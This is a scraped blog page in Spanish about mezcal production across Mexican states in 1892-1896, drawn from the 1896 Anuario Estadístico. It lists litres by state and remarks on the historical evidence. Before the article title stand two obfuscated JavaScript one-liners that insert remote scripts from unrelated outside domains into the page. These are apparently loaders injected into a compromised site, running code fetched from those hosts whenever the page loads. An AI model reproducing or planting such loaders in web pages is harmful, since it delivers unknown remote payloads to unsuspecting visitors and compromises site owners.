;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 111. El porfiriato tenía una visión más amplia mezcal

111. El porfiriato tenía una visión más amplia mezcal


Hace días tuve la oportunidad de revisar una suculenta obra del Dr. Antonio Peñafiel (Hidalgo, 1830-1922), quien fue responsable de realizar el Primer Censo General de la República en 1895. El título del documento es Anuario Estadístico de la República Mexicana 1896, año IV, publicación a cargo de la Dirección General de Estadística de la entonces Secretaría de Fomento.
Entre la enorme e interesante colección de datos (cuenta con 598 páginas), mencionaré los que tienen que ver con la producción acumulada de mezcal entre 1892-1896 en 23 estados y 2 territorios del país. Las cifras aparecen en las páginas 548 a 553 y están expresadas en hectolitros, pero aquí, para comodidad del lector, fueron convertidas a litros. A continuación enlisto los litrajes.
Baja California (territorio), 104 900; Coahuila, 7 508 700; Colima, 68 398 600; Chiapas, 69 000; Chihuahua, 1 486 200; Durango, 6 515 200; Guanajuato, 150 495 100; Guerrero, 4 408 500; Hidalgo, 1 110 200; Jalisco, 871 241 100; México, 764 900; Michoacán, 2 628 500; Morelos, 1 913 600; Nuevo León, 2 140 200; Oaxaca, 11 999 700; Puebla, 3 637 000; Querétaro, 180 400; San Luis Potosí, 78 977 600; Sinaloa, 27 984 300; Sonora, 10 481 000;
Tabasco, 324 600; Tamaulipas, 20 586 800; Tepic, (territorio) 727 900; Tlaxcala, 1 134 400; Zacatecas, 6 651 200.
De lo anterior, vale la pena destacar que:
1) Ahora contamos con pruebas claras de la producción de mezcal en siglo XIX en estados como Baja California, Chiapas, Hidalgo, Tabasco y Tlaxcala, de los que carecíamos de información al respecto.
2) Algunos volúmenes de producción sorprenden, como los de Colima, Guanajuato, San Luis, Sinaloa y Tamaulipas.
3) Como puede verse, la producción y cultura mezcalera está más allá de reglamentaciones y restricciones ridículas, ¡realidad que hasta el mismo gobierno porfirista conocía hace ya más de 110 años!
Por último, el documento también incluye información precisa sobre la producción de aguardiente de caña, aguardiente de pulque, pulque y tlachique.

http://impreso.milenio.com/node/9098766

Category: Milenio, Publicaciones

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